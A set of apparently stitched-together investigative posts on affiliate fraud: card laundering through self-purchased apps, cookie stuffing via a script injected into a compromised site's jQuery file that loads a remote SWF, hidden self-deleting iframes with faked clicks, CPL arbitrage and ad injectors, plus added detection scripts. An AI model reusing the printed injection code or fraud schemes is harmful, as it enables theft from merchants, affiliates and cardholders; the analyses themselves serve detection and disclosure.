“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good ol’ wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

It’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. Ultimately what the fraudster is saying is: why waste time with merchants and legitimate buyers when the enterprising fraudster can be both?

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Think about it a little: fraudsters can sell something that costs next to nothing to build (basically just the CPU cycles spent building an empty app), and the market will happily onboard yet another publisher into its ever-growing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Affiliate programs vary dramatically in their incidence of fraud: in some merchants’ affiliate programs, rogue affiliates fill the ranks of high-earners.  Yet other similarly-sized merchants have little or no fraud.  Why the difference?

In Information and Incentives in Online Affiliate Marketing, Ben Edelman and I examine the impact of varying merchant management decisions.  Some merchants hire specialist outside advisors (“outsourced program managers” or OPMs) to set and enforce program rules.  Others ask affiliate network staff to make these decisions.  Still others handle these tasks internally.

A merchant’s choice of management structure has significant implications for both the information available to decision-makers and the incentives that motivate those decision-makers.  Outside advisors tend to have better information: An OPM sees problems and trends across its many clients.  A network is even better positioned – enjoying direct access to log files, custom reports, and problems reported by any merchant in the network.  That said, outside advisors usually suffer clear incentive problems: most notably, networks are usually paid in proportion to a merchant’s affiliate channel spending, so networks have a significant incentive to encourage merchants to accept even undesirable affiliates.  In contrast, merchants’ own staff typically have incentives more closely aligned with the merchant’s genuine objectives.  For example, many in-house affiliate managers have stock, options, or bonuses that depend on company profitability.  And working in a company builds intrinsic motivation and loyalty.  In short, there are some reasons to think outsourced specialists will yield superior results, but other reasons to favor in-house staff.

To separate these effects, we used crawlers to examine affiliate fraud at what we believe to be an unprecedented scope.  We automated more than 2 million page-loads on a variety of computers and virtual computers, examining the relative susceptibility of all CJ, LinkShare, and Google Affiliate Network merchants (as of spring 2012) to adware, cookie-stuffing, typosquatting, and loyalty apps.

We found outside advisors best able to find the “clear fraud” of adware and cookie-stuffing that are plainly prohibited by network rules.  But in-house staff do better at avoiding “grey area” practices such as typosquatting – schemes less plainly prohibited by network rules, yet still contrary to merchants’ interests.  On balance, there are good reasons to favor each approach – but a merchant choosing outsourced management should be sure to insist on borderline decisions always taken with the merchant’s interests at heart; and a merchant managing its programs in-house should be careful to avoid known cheaters a savvy specialist would more often exclude.

Incidental to our analysis of management structure, we also collected significant data about the scope of affiliate fraud more generally.  Some differences are stark: For example, Table 4 of the article reports Google Affiliate Network merchants suffering, on average, less than half as much adware and cookie-stuffing as LinkShare merchants.  Edelman has been critical of Google on many issues, but when it comes to affiliate quality, GAN was impressive.  GAN’s focus on affiliate quality comes through clearly in our large-sample data.

Our full analysis is under review by an academic journal.

Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.cn results in a request for www.52zhishi.com/v.swf, which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate click links included); the Flash payload in the browser then invisibly requests each of them, and the cookies set by those requests amount to forced/faked affiliate clicks.

The question now is where the initial request to 52zhishi.com comes from, i.e., what exactly is responsible for it. If you search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you search dynamically (via the DOM) you’re still not going to find it. Babyface, like many of the “technical marvels” operating in this space, is not the brightest bulb on the ever-shrinking Christmas tree reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be the jQuery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires...

In compromising this site, he has hidden his activities in this jQuery library. I've broken this down with my own comments added (everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF loaded as a result of this JavaScript then calls an ASP file that lists all of the links to which a visit will be forced. The SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends MovieClip {
 
        public var loader:URLLoader;
        public var url:String;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowDomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = NaN;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new Number(loader.data["safe"]);
            url1 = new String(loader.data["url1"]);
            url2 = new String(loader.data["url2"]);
            url3 = new String(loader.data["url3"]);
            url4 = new String(loader.data["url4"]);
            url5 = new String(loader.data["url5"]);
            url6 = new String(loader.data["url6"]);
            url7 = new String(loader.data["url7"]);
            url8 = new String(loader.data["url8"]);
            url9 = new String(loader.data["url9"]);
            url10 = new String(loader.data["url10"]);
            url11 = new String(loader.data["url11"]);
            url12 = new String(loader.data["url12"]);
            url13 = new String(loader.data["url13"]);
            url14 = new String(loader.data["url14"]);
            url15 = new String(loader.data["url15"]);
            url16 = new String(loader.data["url16"]);
            url17 = new String(loader.data["url17"]);
            url18 = new String(loader.data["url18"]);
            url19 = new String(loader.data["url19"]);
            url20 = new String(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:Error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF
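The injected snippet above is easy to miss in a minified library precisely because the cookie name and the SWF URL never appear as plain strings. As an added example (not code from the original post), here is the static triage pass that turns babyface's obfuscation back into plain text and then checks the file for the injection indicators discussed above: a document.cookie write, a remote .swf, a 1x1 Flash object, a hidden iframe, and the arguments.callee polling loop. SAMPLE_JS is a constructed, shortened stand-in for the tampered jquery.min.js built from the character sequences the post quotes; it is not the file itself.

```javascript
// Added example, not code from the original post. Static triage for a
// JavaScript file suspected of the tampering described above: decode
// String.fromCharCode(...) literals, then scan for injection indicators.
// SAMPLE_JS is a constructed, shortened stand-in for the tampered
// jquery.min.js, using the character sequences quoted in the post.

const FROM_CHAR_CODE_RE = /String\.fromCharCode\(\s*([\d\s,]+)\)/g;

// Replace each String.fromCharCode(98,97,...) call that has only numeric
// arguments with the string it evaluates to, so the rest of the scan sees
// plain text ("babyface", "http://www.52zhishi.com/v.swf").
function decodeFromCharCode(src) {
  return src.replace(FROM_CHAR_CODE_RE, (_, list) => {
    const codes = list.split(',').map(n => parseInt(n, 10)).filter(n => !Number.isNaN(n));
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

const INDICATORS = [
  { name: 'cookie-write',      re: /\.cookie\s*=/ },
  { name: 'remote-swf',        re: /https?:\/\/[^"'\s]+\.swf/i },
  { name: 'flash-object',      re: /application\/x-shockwave-flash/i },
  { name: 'one-pixel-element', re: /width=["']?1["']?\s+height=["']?1["']?/i },
  { name: 'hidden-iframe',     re: /<iframe[\s\S]*?(visibility\s*:\s*hidden|display\s*:\s*none)/i },
  { name: 'arguments-callee',  re: /arguments\.callee/ },
];

function triage(src) {
  const decoded = decodeFromCharCode(src);
  const indicators = INDICATORS.filter(i => i.re.test(decoded)).map(i => i.name);
  const urls = [...new Set([...decoded.matchAll(/https?:\/\/[^"'\s)]+/g)].map(m => m[0]))];
  const verdict = indicators.length === 0 ? 'clean' : indicators.length >= 3 ? 'suspicious' : 'review';
  return { verdict, indicators, urls };
}

// Constructed stand-in for the tampered library: a minified jQuery body would
// precede this, followed by the appended injection.
const SAMPLE_JS = `/*! jQuery (library body omitted) */
(function(){if(document.cookie.indexOf(String.fromCharCode(98,97,98,121,102,97,99,101))==-1){try{var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/";var s=c.createElement("span");var p=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,53,50,122,104,105,115,104,105,46,99,111,109,47,118,46,115,119,102)+"?i="+(new Date()).valueOf();s.innerHTML='<object type="application/x-shockwave-flash" data="'+p+'" width="1" height="1"> ';(function(){if(!c.body){setTimeout(arguments.callee,1000)}else{c.body.insertBefore(s,c.body.lastChild)}})()}catch(e){}}})();`;

console.log(JSON.stringify(triage(SAMPLE_JS), null, 2));
```

Run this against a site's copy of a library and diff the decoded output against the vendor's release of the same version; anything past the library's own closing statement is the injection. The decoder only handles the plain numeric form of fromCharCode; an attacker who computes the codes at runtime needs a sandboxed evaluation instead, which the original post's packet log would have caught anyway.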

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here phonearena.com (much like the fraudster who targeted Venturebeat).

phonearena - affiliate fraud 1

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

ExternalInterface.call("function(fffff) 
{ 
  var xxxxx = document.createElement (\'iframe\'); 
  xxxxx.id = \'xxxxx\'; 
  xxxxx.name = \'xxxxx\'; 
  xxxxx.style.visibility = \'hidden\'; 
  xxxxx.style.width = \'1px\';  
  xxxxx.style.height = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
{ 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 }; 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide — recall Direct Revenue’s dozens of company names.  (By using multiple names, companies seek to avoid the notoriety and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows he is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="http://www.cellphonetech.net/ads/files/xx.php?dtecebenelcedteuea...";
var xxx = document.createElement ("a");
if (typeof(xxx.click) == 'undefined')
{ location.href = url;  }
else
{ xxx.href = url; document.body.appendChild(xxx); xxx.click(); }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning money more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:

berryreview-20
fashionfunda-20
horrnigh-20
insidepulse0b-20
onlinecamer0a-20
rivcitspo-20
stratagonline-20
tecbitbytnib-20
tenetu-20
thechicfash04-20
zenilshroff-20

Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address joannatse01@gmail.com.
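The ID rotation and the ten-second DOM cleanup defeat inspection of any one page load, but they leave a signature in aggregate traffic: an Amazon request carrying a tag= parameter fired within a couple of seconds of the controller script loading, with the tag varying from visitor to visitor. As an added example (not code from the write-up above), here is that detection run over a request log. The log is constructed; the controller path and the Associate IDs are the ones quoted in the post, while the client addresses, timestamps and Referer values are assumptions.

```javascript
// Added example, not code from the original write-up. Mines a request log for
// the stuffing signature discussed above: an Amazon Associates request
// (tag=...-20) fired shortly after the stuffing controller loads, with the
// tag rotating across visitors. LOG is constructed; the controller path and
// Associate IDs are the ones quoted in the post, everything else is assumed.

// Constructed format: <ISO timestamp> <client> <method> <url> <referer or ->
const LOG = `
2013-05-01T10:00:00.000Z 10.0.0.1 GET http://www.phonearena.com/ -
2013-05-01T10:00:00.400Z 10.0.0.1 GET http://www.cellphonetech.net/ads/files/xx.php http://www.phonearena.com/
2013-05-01T10:00:01.100Z 10.0.0.1 GET http://www.amazon.com/?tag=berryreview-20 http://www.cellphonetech.net/ads/files/xx.php
2013-05-01T10:05:00.000Z 10.0.0.2 GET http://www.phonearena.com/ -
2013-05-01T10:05:00.350Z 10.0.0.2 GET http://www.cellphonetech.net/ads/files/xx.php http://www.phonearena.com/
2013-05-01T10:05:00.900Z 10.0.0.2 GET http://www.amazon.com/?tag=fashionfunda-20 http://www.cellphonetech.net/ads/files/xx.php
2013-05-01T10:09:00.000Z 10.0.0.3 GET http://www.phonearena.com/ -
2013-05-01T10:09:00.380Z 10.0.0.3 GET http://www.cellphonetech.net/ads/files/xx.php http://www.phonearena.com/
2013-05-01T10:09:01.250Z 10.0.0.3 GET http://www.amazon.com/?tag=horrnigh-20 http://www.cellphonetech.net/ads/files/xx.php
2013-05-01T10:12:00.000Z 10.0.0.4 GET http://blog.example/best-phones -
2013-05-01T10:12:09.000Z 10.0.0.4 GET http://www.amazon.com/?tag=example-20 http://blog.example/best-phones
`;

const CONTROLLER_HOSTS = new Set(['www.cellphonetech.net']);
// An Amazon hit this soon after the controller load is a script, not a human click.
const WINDOW_MS = 2000;

function parseLog(text) {
  return text.trim().split('\n').map(line => {
    const [ts, client, method, url, referer] = line.trim().split(/\s+/);
    return { t: Date.parse(ts), client, method, url, referer: referer === '-' ? null : referer };
  });
}

// Associates ID from an Amazon URL's tag= parameter, or null for other hosts.
function associateTag(url) {
  const u = new URL(url);
  return /(^|\.)amazon\.com$/.test(u.hostname) ? u.searchParams.get('tag') : null;
}

// Per client, pair each tagged Amazon request with the most recent controller
// load and keep it if it falls inside the window.
function findStuffing(entries) {
  const byClient = new Map();
  for (const e of entries) {
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push(e);
  }
  const findings = [];
  for (const [client, reqs] of byClient) {
    reqs.sort((a, b) => a.t - b.t);
    let controller = null;
    for (const r of reqs) {
      const host = new URL(r.url).hostname;
      if (CONTROLLER_HOSTS.has(host)) { controller = r; continue; }
      const tag = associateTag(r.url);
      if (tag && controller && r.t - controller.t <= WINDOW_MS) {
        findings.push({ client, tag, controller: new URL(controller.url).hostname,
          delayMs: r.t - controller.t });
      }
    }
  }
  return findings;
}

// Several distinct Associates IDs behind one controller is the spreading
// pattern described above; a legitimate affiliate runs one tag per property.
function rotatingIds(findings, minDistinct = 2) {
  const tagsByController = new Map();
  for (const f of findings) {
    if (!tagsByController.has(f.controller)) tagsByController.set(f.controller, new Set());
    tagsByController.get(f.controller).add(f.tag);
  }
  return [...tagsByController]
    .filter(([, tags]) => tags.size >= minDistinct)
    .map(([controller, tags]) => ({ controller, tags: [...tags].sort() }));
}

const found = findStuffing(parseLog(LOG));
console.log(found);
console.log(rotatingIds(found));
```

The window is the important knob: the stuffer's iframe is loaded, navigated and removed within ten seconds, so the Amazon request always lands well under that, whereas a human reading a review and then clicking through takes longer. The legitimate-looking fourth client, nine seconds after a page with no controller load, is left alone.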

Cost Per Lead (CPL) is an advertising model in which the advertiser pays for sign-ups from interested consumers. Affiliates play the middlemen in these transactions: they send interested consumers in the direction of the advertiser, and for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto affiliates, advertisers are spared everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser.

Screenshot: World of Tanks program listing on MaxBounty.

Note the following:

  • Commission rate of "$2.65"/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):

Screenshot: the World of Tanks task as posted on the online forum.

Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link in my browser; the screenshot below shows the result.

Screenshot: packet trace of the World of Tanks click chain.

This is what’s going on in the packet trace:

  1. A subscriber of the online forum decides he wants the $0.40 on offer
  2. He/she starts the task by navigating to http://tinyurl.com/olghhz7
  3. Tinyurl redirects to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154, which then uses JavaScript and an HTML form to redirect the browser to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ (this essentially launders the referrer)
  4. http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ sets up a full-screen iframe containing www.mb57.com, which redirects to the following affiliate click URL: www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks
  5. This URL redirects to track.popmog.com, which redirects to worldoftanks.com

So what you have here is an affiliate taking advantage of a price difference between two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 per sign-up, sell it for $2.65) and a bad deal for World of Tanks (the poor advertiser that bankrolls this operation).
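As an added example (not code from the original post), here is the chain above replayed hop by hop from captured responses, classifying how each hop moves the browser and tracking the Referer header the browser would send at each step. The rule that matters is simple: an HTTP redirect keeps the Referer of the request that triggered it, while a form submit, meta refresh, script navigation or iframe load is a fresh navigation from the current document, so the Referer becomes the current page. That second case is what step 3 launders, and the iframe in step 4 then pins the laundered value for every redirect that follows. The URLs are the ones listed in the post; the status codes, response bodies and the forum URL are constructed stand-ins for the author's packet trace.

```javascript
// Added example, not code from the original post. Replays a captured click
// chain hop by hop, classifies how each hop moves the browser, and tracks the
// Referer the browser would send. RESPONSES is a constructed stand-in for the
// author's packet trace: the URLs come from the post, the status codes and
// bodies are assumptions. Referrer-Policy and HTTPS downgrades, which can
// strip the header entirely, are not modelled.

const RESPONSES = {
  'http://tinyurl.com/olghhz7': {
    status: 301,
    headers: { location: 'http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154' },
    body: '' },
  'http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154': {
    status: 200, headers: {},
    body: '<form id="f" method="post" action="http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/"></form>' +
          '<script>document.getElementById("f").submit();</script>' },
  'http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/': {
    status: 200, headers: {},
    body: '<iframe src="http://www.mb57.com/" style="position:fixed;top:0;left:0;width:100%;height:100%;border:0"></iframe>' },
  'http://www.mb57.com/': {
    status: 302,
    headers: { location: 'http://www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks' },
    body: '' },
  'http://www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks': {
    status: 302, headers: { location: 'http://track.popmog.com/' }, body: '' },
  'http://track.popmog.com/': {
    status: 302, headers: { location: 'http://worldoftanks.com/' }, body: '' },
};

// Work out where a response sends the browser next and by what mechanism.
function nextHop(url, resp) {
  if (resp.status >= 300 && resp.status < 400 && resp.headers.location) {
    return { url: new URL(resp.headers.location, url).href, kind: 'http-redirect' };
  }
  const body = resp.body || '';
  const rules = [
    ['meta-refresh',    /<meta[^>]+http-equiv=["']?refresh["']?[^>]+url=([^"'>\s]+)/i],
    ['form-autosubmit', /<form[^>]+action=["']([^"']+)["'][\s\S]*?\.submit\(\)/i],
    ['js-navigation',   /location(?:\.href)?\s*=\s*["']([^"']+)["']/i],
    ['iframe',          /<iframe[^>]+src=["']([^"']+)["']/i],
  ];
  for (const [kind, re] of rules) {
    const m = re.exec(body);
    if (m) return { url: new URL(m[1], url).href, kind };
  }
  return null;
}

// Follow the chain. An HTTP redirect keeps the Referer of the request that
// triggered it; any other hop is a new navigation from the current document,
// so the Referer becomes the current URL.
function walkChain(startUrl, initialReferer, responses, maxHops = 10) {
  const chain = [];
  let url = startUrl, referer = initialReferer, via = 'click';
  while (url && chain.length < maxHops) {
    chain.push({ url, referer, via });
    const resp = responses[url];
    const hop = resp ? nextHop(url, resp) : null;
    if (!hop) break;                       // landing page, or chain leaves the capture
    if (hop.kind !== 'http-redirect') referer = url;
    via = hop.kind;
    url = hop.url;
  }
  return chain;
}

function summarize(chain) {
  const first = chain[0];
  const last = chain[chain.length - 1];
  return {
    landing: last.url,
    refererSeenByAdvertiser: last.referer,
    laundered: last.referer !== first.referer,
    launderingHops: chain.filter(h => h.via !== 'click' && h.via !== 'http-redirect').map(h => h.via),
  };
}

// 'http://forum.example/tasks' is a constructed stand-in for the forum page.
const chain = walkChain('http://tinyurl.com/olghhz7', 'http://forum.example/tasks', RESPONSES);
console.log(JSON.stringify(summarize(chain), null, 2));
```

The advertiser and the network see macgoodiebag.jncbusinesscreations.com as the referring page on every lead, never the forum that actually sourced the traffic, which is why the incentive-traffic prohibition at MaxBounty is not triggered by anything in the request itself.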

Ad injectors insert ads into others’ sites, without permission from those sites and without payment to those sites. See example screenshots below showing injections into YouTube, Amazon, CNN, Dell, and eBay.

Screenshots: injected ads on YouTube, Amazon, CNN, Dell, and eBay.

In this article, we review the basic operation of ad injectors, then examine the ad networks, exchanges, and other intermediaries that broker the placement of advertising through injectors.
We focus on advertisers and ad networks because their payments are the sole funding of most ad injectors. If advertisers and ad brokers universally rejected injector traffic as improper and unwanted, then injectors would have no reason to exist, no means to pay to get installed on users’ computers, and no reason to continue operation.

We also report which advertisers most often advertise through injectors. Whether through complexity, inattention, or indifference, these advertisers’ expenditures are ultimately the sole revenue source for injectors.

The Business of Ad Injection

To modify the appearance of targeted sites, injectors rely on software installed on users’ computers. Injectors largely target Windows users, though in many instances injectors modify Chrome and Firefox in addition to Internet Explorer. The restricted architecture of mobile devices and tablets currently largely protects those platforms from ad injectors.

We currently primarily see injectors becoming installed through bundles — often, including an injector when a user seeks entirely unrelated software. Typically, the inclusion of the injector is disclosed only midway through the installation process of software that is purportedly “free.” We struggle to reconcile mid-installation disclosure with the “outset of the offer” requirement in the FTC’s Guide Concerning Use of the Word “Free” and Similar Representations: The FTC instructs that if a “free” offer is contingent on other obligations, those obligations must be disclosed at the outset of the offer, not midway through.

A separate potential concern comes from installation disclosures that are less than forthright. For example, injector installation disclosures often state that ads may be displayed “when you browse the web.” This vague disclosure is at best unclear as to where ads will appear, giving consumers little warning that ads will in fact be inserted to appear within the sites users view. Consumers have little reason to suspect that installing a program can change the appearance of entirely unrelated web sites, and this vague disclosure, lacking in specifics and appearing midway through an installation process, fails to tell consumers what they are purportedly accepting.

